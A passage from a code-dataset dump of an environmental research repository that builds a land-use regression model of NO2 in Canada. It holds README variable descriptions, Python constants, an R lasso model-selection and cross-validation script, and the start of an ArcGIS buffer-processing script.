Datasource: 1.\n- **te_14_16** - mean of te_14, te_15, and te_16. Units: degrees celcius. Datatype: Float. Datasource: 1.\n- **sat_10_12** - annual mean NO2. Units: ppb. Datatype: Float. Datasource: 2.\n\n#### Buffer based variables #### \n\nbuffer distances range from 10m to 20km. Units are in meters and the datatype is float for buffer based variables unless indicated otherwise\n- **alXXXXm** - sum area of industrial land use in buffer distance XXXX. Datasource: 5.\n- **blXXXXm** - sum area of open space or parks in buffer distance XXXX. Datasource: 5.\n- **bRXXXXm** - length of expressways in buffer distance XXXX. Datasource: 5.\n- **clXXXXm** - sum area of residential land use in buffer distance XXXX. Datasource 5.\n- **cRXXXXm** - length of highways in buffer distance XXXX. Datasource: 5. \n- **dRXXXXm** - length of local roads in buffer distance XXXX. Datasource: 5.\n- **eRXXXXm** - length of major roads in buffer distance XXXX. Datasource: 5.\n- **fRXXXXm** - length of roads with truck restrictions in buffer distance XXXX. Datasource: 5.\n- **RaXXXXm** - length of railway and transit lines in buffer distance XXXX. Datasource: 5.\n- **waXXXXm** - percent area water in buffer distance XXXX. Datasource 3.\n- **NDVI_14_16_XXXXm** - three year (2014-2016) average of mean value of max annual NDVI in buffer distance XXXX. Datasource: 4.\n- **NYXXXXm** - mean value of max annual NDVI in buffer distance XXXX for year 201Y. Datasource 4.\n\n\n\n### Datasources ###\n\n1. **Daymet V3: Daily Surface Weather and Climatological Summaries** Author: NASA. Spatial Resolution: 1000m. Temporal Resolution: Daily. Downloaded from the Google Earth Engine (https://explorer.earthengine.google.com/#detail/NASA%2FORNL%2FDAYMET_V3) <br>\n2. **Geddes, J. A.; Martin, R. V.; Boys, B. L.; van Donkelaar, A. Long-term trends worldwide in ambient NO2 concentrations inferred from satellite observations. Environ. Health Perspect. Online 2016, 124 (3), 281** Spatial Resolution: 1km. Temporal Resolution: three year rolling average. <br> \n3. **GLCF: Landsat Global Inland Water.** Author: GCLF. Spatial Resolution: 30m. Temporal Resolution: Basd on year 2000. Downloaded from Google Earth Engine (https://developers.google.com/earth-engine/datasets/catalog/GLCF_GLS_WATER)\n4. **Landsat 8 Collection 1 Tier 1 8-Day NDVI Composite. ** Author: Google. Spatial Resolution: 30m. Temporal Resolution: 8day. Downloaded from Google Earth Engine (https://developers.google.com/earth-engine/datasets/catalog/LANDSAT_LC08_C01_T1_8DAY_NDVI). \n5. **Canda Geospatial Data.** Author: DTMI. Spatial Resolution: NA. Temporal Resolution: Annual, 2015.\n6. **Population Density.** Author: Statistics Canada. Spatial Resolution: Census Block. Temporal Resolution: Based on year 2016.\n7. **National Air Pollutants Surveillance Program NO2 Measurements** Author: Department of the Environment, Canada. Spatial Resolution: NA. Temporal Resolution: Annual.\n8. **National Pollutant Release Inventory** Author: Department of the Environment, Canada. Spatial Resolution: NA. Temporal Resolution: Annual, based on year 2016. \n\n### Processing Scripts ###\n\nScripts 1 through 4 were used to derived exposure estimates. Script 5 was used to preprocess data, and script 6 was used to create the LUR model.\n\n1. [**downloadEnvRasters_Canada_LUR.py**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/downloadEnvRasters_Canada_LUR.py) - download NDVI, precipitation, and temperature from Google Earth Engine. \n2. [**calcEnvBuffers_Canada_LUR.py**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/calcEnvBuffers_Canada_LUR.py) - calculate buffer variables for Air Monitor Station Locations. \n3. [**bufferFunctions_Canada_LUR.py**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/bufferFunctions_Canada_LUR.py) - helper functions for script 2.\n4. [**constantValues_Canada_LUR.py**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/constantValues_Canada_LUR.py) - constant values for script 2.\n5. [**threeYearAverages_Canada_LUR.py**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/threeYearAverages_Canada_LUR.ipynb) - calculate three year averages for NDVI and air monitor NO2 datasets. Merge land use and air monitor datasets.\n6. [**sumRoadBuffers_Canada_LUR.ipynb**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/sumRoadBuffers_Canada_LUR.ipynb) - sum road buffer variables to create combinatory road variables (e.g. highways and expressways).\n6. [**modelSelection_Canada_LUR.R**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/modelSelection_Canada_LUR.R) - select env variables and create LUR NO2 model.\n" }, { "alpha_fraction": 0.6189054846763611, "alphanum_fraction": 0.6616915464401245, "avg_line_length": 32.516666412353516, "blob_id": "3356dd0c9fda129f075720a14e7433cdf63de3df", "content_id": "6e756be5ad4589d3aad582ebbd451773851aabe5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2010, "license_type": "permissive", "max_line_length": 95, "num_lines": 60, "path": "/Processing Scripts/constantValues_Canada_LUR.py", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "############## define settings and variables #########\nKEYWORD = \"Partition\"\nZONE_KEYWORD = 'z'\nPARTITION_KEYWORD = \"i\"\nRASTER_TYPE = 0\nPOLYLINE_TYPE = 1\nPOINT_TYPE = 3\nPARALLEL_PROCESSING = 2\nPOINT_BUFFER_TYPE = 4\nBUFFER_EXTENSION = \"/buffers/\"\nAIRMONITOR_ID = \"FID\"\nTABLE_ID = \"ORIG_FID\"\nBUFFER_ID = \"FID_buffer\"\nLENGTH_COMMAND = \"!shape.length@kilometers!\" # command for field calculator operation\nCARBON_COMMAND = \"!SUM_carbon! * 1\"\nTEMP_STATS_WORKSPACE = \"tempStats\"\nRATER_PROCESS_WAIT_TIME = 60\nTEST_PROGRESS_FILE = \"test_progress.txt\"\n\nPARENT_FOLDER = \"C:/users/larkinan/desktop/CanadaLUR/\"#\"S:/Restricted/PURE_AIR/Canada_LUR_NO2/\"\nINPUT_FOLDER = PARENT_FOLDER + \"screenedMax/\"\nMONITOR_FILE= \"AirMonitors_Screened_Albers.shp\"\nRESULTS_FOLDER = PARENT_FOLDER + \"Results/\"\n\n#MONITOR_FILE = \"zone5.shp\"\n#INPUT_FOLDER =\"C:/users/larkinan/desktop/Global_LUR_processing/pyInput/\"\n#RESULTS_FOLDER = \"C:/users/larkinan/desktop/Global_LUR_processing/pyResults/\"\nMOSAIC_RASTER_LIST = []\nPOLLYLINE_MOSAIC_LIST = []\n\n#POLYLINE_LIST = [\"RailAndTransitLine_Albers.shp\",\n# \"aRDS_C123_Albers.shp\", \n# \"bRDS_expressways_Albers.shp\",\n# \"cRDS_highways_Albers.shp\",\n# \"dRDS_Local_Albers.shp\",\n# \"eRDS_Major_Albers.shp\",\n# \"fRDS_Truck_Restrictions_Albers.shp\"]\n\n\n#POLYLINE_LIST = [\"aLU_Industriall_Albsers_Dissolve.shp\",\n# \"bLU_Open_Parksl_Albsers_Dissolve.shp\",\n# \"cLU_Residential_Albsers_Dissolve.shp\"]\nPOLYLINE_LIST = []\n\n\n \nPOINT_BUFFER_LIST = []\nPOINT_MOSAIC_LIST = []\nPOINT_LIST = [] #TODO include NO2 satellite raster?\nRASTER_LIST = [\"N6.tif\",\"water_body5.tif\"]\n\nZONE_DEFINITIONS = \"zoneDef.shp\"\n#POLYLINE_LIST = []\n#COAST_BOUNDARY = \"coastline.shp\"\n#BUFFER_DISTANCE =[2000,200]\nBUFFER_DISTANCE = [50,100,250,500,750,1000,2000,3000,4000,5000,10000,15000,20000]\n#BUFFER_DISTANCE = [100,1000,10000]\nPARTITION_SIZE = 50\n\n####### end of define settings and variables #########" }, { "alpha_fraction": 0.6421709060668945, "alphanum_fraction": 0.6773303151130676, "avg_line_length": 31.614999771118164, "blob_id": "beba33ced0a7d582737868d324f923cd8bd16379", "content_id": "f526ed39f75df0896a855ab28e1ff7b848e071c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 19568, "license_type": "permissive", "max_line_length": 186, "num_lines": 600, "path": "/Processing Scripts/modelSelection_Canada_LUR.R", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "############ model_selection.R ############\n# Author: Andrew Larkin\n# Developed for Perry Hystad, Oregon State University\n# Date created: September 18, 2018\n# This script performs lasso varaible selection and incremental varaible buffer reduction for the NO2 LUR model.\n# RMSE, AME, R2, Adj. R2, MB, and MAB are calculated for the final model. The model coefficients, and minimum \n# p-value and percent variance explained for each variable and each region are also calculated.\n\n####### load required packages #########\nlibrary(glmnet) # lasso regression\n\n######################## helper functions #####################\n\n\n\n# create a matrix in which the sign of protective variables \"tr, ND, wa, us, and oe\" are flipped. \n# flipping the sign of protective variables allows the lasso regression to restrict coefficients to \n# positive coefficients only: that is, a positive coefficient of an inverted protective value is \n# equivalent to a negative value before the sign of the variable was flipped\n# INPUTS:\n# inData (dataframe) - matrix containing dataset \n# OuTPUTS:\n# inData (dataframe) - same matrix as input data, but with the signs of the protective\n# variables flipped\nposCoeffMatrix <- function(inData) {\n tempNames <- names(inData)\n endLength <- length(tempNames)\n switchList <- c(\"bL\",\"ND\",\"wa\",\"pr\",\"port_dist\") # list of two characters that indicate protective variables\n # for each variable in the dataset, check if the variable is in the list of protective variables.\n # if the variable is protective, multiply the value by 1\n for(i in 1:endLength) {\n predType <- substr(tempNames[i],1,2)\n \n if(predType %in% switchList) {\n inData[,i] <- inData[,i]*-1\n } \n }\n return(inData)\n \n} # end of posCoefMatrix\n\n\n\n# create a multipanel image in ggplot2. thanks to [email protected] for providing this function.\n# function was downloaded from http://www.cookbook-r.com/Graphs/Multiple_graphs_on_one_page_(ggplot2)/\nmultiplot <- function(..., plotlist=NULL, file, cols=1, layout=NULL, save) {\n library(grid)\n \n # Make a list from the ... arguments and plotlist\n plots <- c(list(...), plotlist)\n \n numPlots = length(plots)\n \n # If layout is NULL, then use 'cols' to determine layout\n if (is.null(layout)) {\n # Make the panel\n # ncol: Number of columns of plots\n # nrow: Number of rows needed, calculated from # of cols\n layout <- matrix(seq(1, cols * ceiling(numPlots/cols)),\n ncol = cols, nrow = ceiling(numPlots/cols))\n }\n if(save!=FALSE) {\n ppi <- 300\n png(save, width=10*ppi, height=12*ppi,res=ppi)\n }\n if (numPlots==1) {\n print(plots[[1]])\n \n } else {\n # Set up the page\n grid.newpage()\n pushViewport(viewport(layout = grid.layout(nrow(layout), ncol(layout))))\n \n # Make each plot, in the correct location\n for (i in 1:numPlots) {\n # Get the i,j matrix positions of the regions that contain this subplot\n matchidx <- as.data.frame(which(layout == i, arr.ind = TRUE))\n print(plots[[i]], vp = viewport(layout.pos.row = matchidx$row,\n layout.pos.col = matchidx$col))\n }\n }\n \n if(save!=FALSE) {\n dev.off()\n }\n} # end of multiplot\n\n\n\n\n# identify the buffer sizes included in the variales in the input dataset. This is done\n# by removing the first two characters from each variable and converting the remaining \n# characters from characters to an integer value\n# INPUTS:\n# inputData (dataframe) - matrix containing variables with buffer distances of interest \n# OuTPUTS:\n# buffDist (integer array) - array containing buffer distances, in ascending order\ngetBuffDistVec <- function(inputData) {\n buffDist <- rep(100,length(inputData)) # array that will contain output data\n # for each variable, extract the buffer distance from the variable name and conver to an\n # integer\n for(j in 1:length(inputData)) { \n endP <- nchar(inputData[j]) -1 \n buffDist[j] <- as.numeric(substr(inputData[j],3,endP))\n } \n buffDist <- buffDist[order(buffDist)] #order buffer distances in ascending order\n return(buffDist)\n} # end of getBuffDistVec\n\n\n\n# reduce buffers to only those that are more than x fold distance apart from one another\n# INPUTS:\n# inputData (dataframe) - matrix containing variables with buffer distances of interest \n# OuTPUTS:\n# buffDist (integer array) - array containing buffer distances, in ascending order\nreduceBuffList <- function(inputData,fold=3) {\n index = 1\n while(index<length(inputData)) {\n finishedVarCompare = FALSE\n while(finishedVarCompare == FALSE & index <length(inputData)) {\n if(inputData[index+1]/inputData[index] <= fold) {\n inputData <- inputData[-(index+1)]\n }\n else {\n finishedVarCompare=TRUE\n }\n }\n index = index +1\n }\n return(inputData)\n} \n\n\n\n# reduce incremental variables within x fold values of the smallest vriable size\n# INPUTS:\n# inCoef (float array) \n# OuTPUTS:\n# buffDist (integer array) - array containing buffer distances, in ascending order\nreduceLassoModel <- function(inCoef,inPred,fold=5) {\n \n # create a vector of the first two characters for all variables\n bufferTypes <- c(\"aL\",\"bL\",\"bR\",\"cL\",\"cR\",\"dR\",\"eR\",\"fR\",\"wa\",\"NDVI_14_16_\") \n \n a <- which(inCoef > 0) # identify which variables were selected by lasso regression\n b <- a[2:length(a)]-1 # remove the intercept from the model \n subNames <- names(inPred)[b] # get the names of the variables selected by lasso regression\n finalList <- c()\n index <- 0\n \n # for each type of varaible, remove variables that are within 3 fold of a smaller variable\n for(index in 1:length(bufferTypes)) {\n tempData <- subNames[substr(subNames,1,2) %in% bufferTypes[index]] \n \n # get the the distances for all buffers of the selected variable type\n if(length(tempData)>0) {\n cat(tempData)\n buffList <- getBuffDistVec(tempData)\n cat(buffList)\n reduced <- reduceBuffList(buffList,fold)\n m <- \"m\"\n reduced <- paste(bufferTypes[index],reduced,m,sep=\"\")\n finalList <- c(finalList,reduced)\n }\n }\n \n otherVars <- subNames[substr(subNames,1,2) %in% bufferTypes == FALSE]\n finalList <- c(finalList,otherVars)\n return(finalList)\n} # end of reduceLassoMode\n\n\n\n\n\n# calculate the IQR for all variables in a matrix\n# INPUTS:\n# inMatrix (dataframe) - variables for which IQR should be calculated\n# OUTPUTS:\n# IQRVals (float array) - array of IQR values, in the same order as the \n# variables in inMatrix\ncalcIQR <- function(inMatrix) {\n IQRVals <- rep(0,length(inMatrix[1,]))\n for(i in 1:length(inMatrix[1,])) {\n IQRVals[i] <- IQR(inMatrix[,i])\n }\n return(IQRVals)\n} # end of calcIQR\n\n\n\n# remove variables that don't have enough measurements greater than 0 in the input dataset\n# INPUTS:\n# inData (dataframe) - dataset containing predictor variables\n# minNumObs (int) - minimum number of observations that a dataset must contain\n# OUTPUTS:\n# drops (string array) - names of the variables that don't have minNumObs number of observations in \n# inData\nrestrictBuffsByNumObs <-function(inData,minNumObs) \n{\n attach(inData)\n vars <- names(inData)\n for(i in 1:length(vars)) \n {\n currVar <- get(vars[i])\n nObs <- length(inData[currVar>0,1])\n if(minNumObs > nObs) \n {\n drops <- c(drops,vars[i])\n }\n }\n detach(inData)\n return(drops)\n}\n\n\n\ncalcPercentGreaterThan0 <-function(inData,minNumObs) \n{\n attach(inData)\n vars <- names(inData)\n totalObs <- length(inData[,1])\n percentObs <- rep(0,length(vars))\n for(i in 1:length(vars)) \n {\n currVar <- get(vars[i])\n nObs <- length(inData[currVar>0,1])\n percentObs[i] <- nObs/totalObs\n }\n detach(inData)\n return(percentObs)\n}\n\n\nsubsetRoads <- function(inData,keepsat = TRUE) {\n roadsLabel <- c(\"bR\",\"cR\",\"dR\",\"eR\",\"fR\",\"alRds\")\n keeps <- c()\n bufferDists <- c(50,100,250,500,750,1000,2000,3000,4000,5000,10000,15000,20000)\n for(i in 1:length(roadsLabel))\n {\n for(j in 1:length(bufferDists)) \n {\n varName <- paste(roadsLabel[i],as.character(bufferDists[j]),\"m\", sep=\"\")\n keeps <- c(keeps, varName)\n }\n \n }\n if(keepsat) keeps <- c(keeps,\"sat_10_12\")\n returnData <- inData[ , (names(inData) %in% keeps)]\n return(returnData)\n}\n\nsubsetBuiltEnv <- function(inData,keepProtectors = TRUE,keepsat = TRUE)\n{\n builtEnvLabel <- c(\"aL\",\"bL\",\"cL\")\n if(keepProtectors) builtEnvLabel <- c(builtEnvLabel,\"wa\",\"NDVI_14_16_\")\n keeps <- c()\n bufferDists <- c(50,100,250,500,750,1000,2000,3000,4000,5000,10000,15000,20000)\n for(i in 1:length(builtEnvLabel))\n {\n for(j in 1:length(bufferDists)) \n {\n varName <- paste(builtEnvLabel[i],as.character(bufferDists[j]),\"m\", sep=\"\")\n keeps <- c(keeps, varName)\n }\n }\n if(keepsat) keeps <- c(keeps,\"sat_10_12\")\n returnData <- inData[ , (names(inData) %in% keeps)]\n return(returnData)\n}\n\ndropNDVI <- function(inData)\n{\n dropLabel <- c(\"NDVI_14_16_\")\n drops <- c()\n bufferDists <- c(500,750,1000,2000,3000,4000,5000,10000,15000,20000)\n for(i in 1:length(dropLabel))\n {\n for(j in 1:length(bufferDists)) \n {\n varName <- paste(dropLabel[i],as.character(bufferDists[j]),\"m\", sep=\"\")\n drops <- c(drops, varName)\n }\n }\n returnData <- inData[ , !(names(inData) %in% drops)]\n return(returnData)\n}\n\n\n\ncreateLassoModel <- function(inData) \n{\n \n tempMat <- as.matrix(posCoeffMatrix(inData)) # reverse direction of protective variabless\n cvfit <- glmnet::cv.glmnet(tempMat,NO2_vals,type.measure = \"mse\",standardize=TRUE,alpha = 1,lower.limit=0) # perform lasso regression\n coefRaw <- coef(cvfit, s = \"lambda.1se\")\n keeps <- reduceLassoModel(coefRaw,inData,3)\n \n return(keeps)\n}\n\n\n\n\n# calculate and graph the partial R2 values for all variables and continental regions.\n# INPUTS:\n# inData (dataframe) - data matrix containing predictor variables\n# inMonitor (float array) - array containing monitor measurements\ncalcPartialR2 <- function(inData, inMonitor) {\n \n tempMat <- as.matrix(inData)\n tempMonitor <- inMonitor\n partialR2 <- rep(0,length(inData))\n lmTotal <- lm(tempMonitor~tempMat)\n \n \n # claculate partial R2 for all variables in the dataset\n ssrTot <- sum(anova(lmTotal)$\"Sum Sq\"[1:2])\n sseTot <- anova(lmTotal)$\"Sum Sq\"[2]\n for(i in 1:length(inData)) {\n tempRemove <- names(inData)[i]\n tempData <- tempMat[ , !names(inData) %in% tempRemove]\n tempLm <- lm(tempMonitor~tempData)\n tempSSR <- anova(tempLm)$\"Sum Sq\"[1]\n tempSSE <- anova(tempLm)$\"Sum Sq\"[2]\n partialR2[i] <- (tempSSE - sseTot)/tempSSE\n }\n \n valMat <- round(partialR2*100,2)\n \n \n return(valMat)\n \n} # end of graphPartialR2\n\n\n\n\n\n# using an input dataset, randomly partition a training and testing dataset for cross-validation\n# INPUTS:\n# inData (dataframe) - input dataset with predictor variables and air monitor measurements\n# sampProp (float) - value ranging from 0 to 1, indicating the proportion of data that should be partitioned to the training dataset\n# zoneVals (int vector) - indicates which zone the corresponding row of the input dataset belongs to\n# OutPUTS:\n# returnData (dataframe) - input dataset with an indicator variable of whether each row belongs to the train or test partition\ncreateTrainAndTest <- function(inData,sampProp) {\n \n smp_size <- floor(sampProp* nrow(inData)) # calculate the sample size for the training dataset\n cat(smp_size)\n train_ind <- sample(seq_len(nrow(inData)), size = smp_size) # randomly sample the entire dataset to make the training dataset\n train <- inData[train_ind, ]\n test <- inData[-train_ind, ]\n \n \n # create an indicator variable for whether a given sample (row in the dataset is a train or test point)\n train$ind <- rep(0,nrow(train))\n test$ind <- rep(1,nrow(test))\n \n returnData <- rbind(train,test) # combine the train and test dataset and return the result\n return(returnData)\n} # end of createTrainAndTest\n\n\n\n\n\n\n# perform leave 10% out cross-validation numRep number of times. Return the root mean square, mean abs square, r-square,\n# adjusted r-square, bias, and abs bias\n# INPUTS:\n# inData (dataframe) - input data frame containing both the predictor and air monitor variables\n# numReps (int) - number of cross-validation repititions to perform\n# OUTPUTS:\n# returnData (dataframe) - summary statistics of the cross-validation, for each region\ncrossValidation <- function(inPredictors,inMonitors,numReps,percTrain =0.8) {\n \n rmse <- ase <- rsq <- adjRsq <- bias <- absBias <- 0\n \n inPredictors$monitor <- inMonitors\n combinedData <- inPredictors\n \n p <- 1\n \n \n # for each cross-validation repitition\n for(i in 1:numReps) {\n cat(i) # print the repitition number to the screen\n cat(\"\\n\")\n \n trainInd <- createTrainAndTest(combinedData,percTrain) # create training and testing datasets\n \n # partition trainInd into training and test datasets based on the indicator variable ind ( 0 = 1, 1 = test)\n monitor <- trainInd$monitor \n trainInd <- trainInd[ , !(names(trainInd) %in% c(\"monitor\"))]\n trainSet <- subset(trainInd,ind == 0)\n trainMonitor <- subset(monitor,trainInd$ind == 0)\n testSet <- subset(trainInd,trainInd$ind == 1)\n testMonitor <- subset(monitor,trainInd$ind == 1)\n drops <- c(\"ind\",\"monitor\")\n trainSet <- trainSet[ , !(names(testSet) %in% drops)]\n testSet <- testSet[ , !(names(testSet) %in% drops)]\n \n lmModel <- lm(trainMonitor ~ aL2000m + NDVI_14_16_250m + sqTemp + logSat + sqAr + sqRa + sqPop + NDVI_14_16_250m + logSat + sqTemp\n , data = trainSet)\n coefRaw <- lmModel$coefficients\n \n testMat <- cbind(rep(1,nrow(testSet)),testSet)\n \n # create predictions for the test dataset based on the variables selected by the training dataset\n #pred <- as.vector(coefRaw[1:length(coefRaw)]%*%t(testMat))\n pred <- predict(lmModel,testSet)\n residuals <- testMonitor-pred\n n <- length(testMonitor)\n \n \n # calculate summary statistics \n ase <- ase + mean(abs(residuals))\n sumSqErr <- sum(residuals^2)\n sumTot <- sum((testMonitor - mean(testMonitor))^2)\n rsq <- 1 - (sumSqErr/sumTot)\n rmse <- rmse + sqrt(mean(residuals^2))\n adjRsq <- adjRsq + 1 - (((1-rsq)*(n-1))/(n-p-1))\n absBias <- absBias + (100/length(residuals))*(sum(abs(residuals)/testMonitor))\n bias <- bias + (-100/length(residuals))*(sum(residuals/testMonitor))\n \n \n }\n \n ase <- ase/numReps\n rmse <- rmse/numReps\n absBias <- absBias/numReps\n bias <- bias/numReps\n adjRsq <- adjRsq/numReps\n \n returnData <- data.frame(rmse,ase,adjRsq,bias,absBias) # combine evaluation statistics into a dataframe to return as output\n return(returnData)\n \n} # end of crossValidation\n\n\n\n\n# create predictions for the test dataset based on the variables selected by the training dataset\n#pred <- as.vector(coefRaw[1:length(coefRaw)]%*%t(testMat))\npred <- predict(lmModel,candidateModel)\nresiduals <- NO2_vals-pred\nn <- length(NO2_vals)\n\n# calculate summary statistics \nase <- mean(abs(residuals))\nsumSqErr <- sum(residuals^2)\nsumTot <- sum((NO2_vals - mean(NO2_vals))^2)\nrsq <- 1 - (sumSqErr/sumTot)\nmse <- sqrt(mean(residuals^2))\nn <- length(residuals)\np <- 1\nadjRsq <- 1 - (((1-rsq)*(n-1))/(n-p-1))\nabsBias <- (100/length(residuals))*(sum(abs(residuals)/NO2_vals))\nbias <- (-100/length(residuals))*(sum(residuals/NO2_vals))\n\n\n\n\n\n################# main script #################\n\nlibrary(ggplot2)\nlibrary(glmnet)\n\n#setwd(\"C:/users/larkinan/documents/Canada_NO2_LUR_14_16/Datasets\")\nsetwd(\"C:/users/larkinan/documents/Canada_NO2_LUR_14_16/Datasets\")\n\n\nrawData <- read.csv(\"Canada_LUR_preprocessed_Sep17_18_v2.csv\")\n\n\n\n# setup data for processing\nscreenedData <- subset(rawData,elevation >-1)\nNO2_vals <- screenedData$meanNO2_2014_2016\ndrops <- c(\"meanNO2_2014_2016\",\"NAPS.ID\",\"percent.completeness_2013\",\"percent.completeness_2014\",\"percent.completeness_2015\",\n \"percent.completeness_2016\",\"mean_2013\",\"mean_2014\",\"mean_2015\",\"mean_2016\", \"numObs\", \"medYr\", \"minNO2\", \"meanNO2\", \"maxNO2\", \"stdDevNO2\", \"numMeas\",\"FID\",\"NAME\",\"CONTINENT\")\ndrops <- c(drops,\"pr_14_16\")\ndrops <- restrictBuffsByNumObs(screenedData,10)\nexactMatrix <- screenedData[ , !(names(screenedData) %in% drops)]\nexactMatrix <- dropNDVI(exactMatrix)\nexactMatrix$logTemp <- log(exactMatrix$te_14_16+3)\nexactMatrix$sqTemp <- (exactMatrix$te+3)^2\nexactMatrix$logSat <- log(exactMatrix$sat_10_12)\nexactMatrix$sqAr <- sqrt(exactMatrix$aR250m)\nexactMatrix$sqRa <- sqrt(exactMatrix$Ra750m)\nexactMatrix$sqPop <- sqrt(exactMatrix$PD20000)\n\ntempMat <- as.matrix(posCoeffMatrix(exactMatrix)) # reverse direction of protective variabless\ncvfit <- glmnet::cv.glmnet(tempMat,NO2_vals,type.measure = \"mse\",standardize=TRUE,alpha = 1,lower.limit=0) # perform lasso regression\ncoefRaw <- coef(cvfit, s = \"lambda.1se\")\nkeeps <- reduceLassoModel(coefRaw,exactMatrix,3)\n\n\ncreateLassoModel(exactMatrix)\n\n\n\n\nkeeps <- c(\"aL2000m\", \"sqRa\",\"sqAr\",\"logSat\",\"sqPop\",\"sqTemp\",\"NDVI_14_16_250m\")\ncandidateModel <- exactMatrix[ , (names(exactMatrix) %in% keeps)]\ncalcPartialR2(candidateModel,NO2_vals)\n\nlmModel <- lm(NO2_vals~ as.matrix(candidateModel))\npredSub <- lmModel$fitted.values\n\n\n\n\ncrossValidation(candidateModel,NO2_vals,10000,0.8)\n\n\n\n\n\n\n\n\n################## SUPPLEMENTAL SENSITIVITy ANALYSES ##############\n\n\n\n\n\n\n\n############### test for sensitivity to percent monitor requirement ############\n\n\n# at least 10 % of monitors have a value greater than 0\nsummary(lm(NO2_vals ~ aL2000m + aR250m + te_14_16 + pr_14_16 + sat_10_12 + PD20000 + NDVI_14_16_250m \n , data = exactMatrix))\n\n\n# at least 25% of monitors have a value greater than 0\nsummary(lm(NO2_vals ~ aL2000m + Ra500m + te_14_16 +pr_14_16+ sat_10_12 + PD20000 + NDVI_14_16_250m \n , data = exactMatrix))\n\n\n# at least 50% of monitors have a value greater than 0\nsummary(lm(NO2_vals ~ aL2000m + aR1000m + te_14_16 + pr_14_16 +\n sat_10_12 + PD20000 + NDVI_14_16_250m,data=exactMatrix))\n\n\n\n############### create models restricted to specific land use classes ###############\n\n\n########### roads models ##############\n\n# without satellite \nroadsData <- subsetRoads(exactMatrix,FALSE)\ncreateLassoModel(roadsData)\nlinear_model <- lm(NO2_vals ~ eR2000m + dR15000m + alRds1000m, data = exactMatrix)\n\n# with satellite \nroadsData <- subsetRoads(exactMatrix)\ncreateLassoModel(roadsData)\nlinear_model <- lm(NO2_vals ~ eR2000m + sat_10_12 + dR15000m + alRds1000m, data = exactMatrix)\n\n\n############ meteorological models ###########\n\n# without satellite #\nlinear_model <- lm(NO2_vals ~ pr_14_16 + te_14_16, data = exactMatrix)\n\n# with satellite #\nlinear_model <- lm(NO2_vals ~ pr_14_16 + te_14_16 + sat_10_12, data = exactMatrix)\n\n\n\n############# built env models ##############\n\nbuiltEnvData <- subsetBuiltEnv(exactMatrix)\n\n# with protective variables and satellite\ncreateLassoModel(builtEnvData,FALSE)\nbuiltEnvData <- subsetBuiltEnv(exactMatrix,FALSE,TRUE)\nlinear_model <- lm(NO2_vals ~ aL2000m + aL15000m + cL5000m + sat_10_12 + NDVI_14_16_250m + NDVI_14_16_2000m + NDVI_14_16_10000m, data = exactMatrix)\nbuiltEnvData <- subsetBuiltEnv(exactMatrix,FALSE)\n\n# with satellite but not protective variables\ncreateLassoModel(builtEnvData)\nlinear_model <- lm(NO2_vals ~ aL2000m + aL10000m + cL5000m + sat_10_12, data = exactMatrix)\n\n# no satellite or protective variables \nbuiltEnvData <- subsetBuiltEnv(exactMatrix,FALSE,FALSE)\ncreateLassoModel(builtEnvData)\nlinear_model <- lm(NO2_vals ~ aL2000m + aL15000m + cL5000m , data = exactMatrix)\n\n\n\n########### end of ModelSelection.R ##########" }, { "alpha_fraction": 0.6153075695037842, "alphanum_fraction": 0.6209585070610046, "avg_line_length": 53.609375, "blob_id": "8a92fd946d264ddbd7559415779fc70c8dddc0ae", "content_id": "87d6438691602bd70055ab5f548173c7d02f5348", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13980, "license_type": "permissive", "max_line_length": 181, "num_lines": 256, "path": "/Processing Scripts/calcEnvBuffers_Canada_LUR.py", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "\n################# runScripts.py ##################\n#\n# Contains functions for automating several ArcGIS functions during the development of a Land Use Regression model.\n# Functions include generating a series of buffers around points in a shapefile, determining polyline length within each unique buffer,\n# and determining arverage raster values within the buffer.\n#\n# Author: Andrew Larkin\n# Created for: Perry Hystad, Oregon State University\n# Last modified: 12/08/2014\n#\n# Requirements:\n# ArcGIS with spatial extension (tested on ArcGIS v. 10.2)\n# ArcGIS comptabile version of python (tested with Python v. 2.7)\n# Python integrated development environment is highly recommended but not required\n# StatisticsForOverlappingZones.py script (provided by NOAA) is required for the batchRasterBufferIntersect function\n# BufferVariables.py contains many custom functions called by runScripts.py\n# constantValues.py conatins all modifiable input values (e.g. input files, folder locations)\n\n############## import required modules ###############\nimport os\nimport BufferVariables\nimport multiprocessing\nimport arcpy\nimport constantValues as values\nimport gc\narcpy.env.overwriteOutput = True\nimport shutil\nimport time\nimport constantValues\n############## end of module import ##################\n\n\n\n########### helper functions ################\n\n# create all of the buffer zones for all of the air monitor partitions \ndef makeBufferZones(airMonitorPartitions):\n pool = multiprocessing.Pool()\n pool.map(BufferVariables.makeMultipleBuffers, airMonitorPartitions) # run make buffer zones on parallel processes\n pool.close()\n pool.join() \n print (\"completed making buffer zones for all partitions\")\n del pool\n### end of makeBufferZones ###\n\ndef determineRasterList(airMonitor, rasterValues):\n for fileName in values.RASTER_LIST:\n rasterValues.append(fileName)\n if(len(values.MOSAIC_RASTER_LIST) > 0):\n for variable in values.MOSAIC_RASTER_LIST:\n zone = BufferVariables.determineAirMonitorZone(airMonitor)\n mosaicFilename = BufferVariables.determineMosaicFile(variable,zone,values.RASTER_TYPE)\n # print(mosaicFilename) \n rasterValues.append(mosaicFilename) \n # print(rasterValues)\n\ndef determinePolylineList(airMonitor, polyLineValues):\n for fileName in values.POLYLINE_LIST:\n polyLineValues.append(fileName)\n if(len(values.POLLYLINE_MOSAIC_LIST) > 0):\n for variable in values.POLLYLINE_MOSAIC_LIST:\n zone = BufferVariables.determineAirMonitorZone(airMonitor)\n 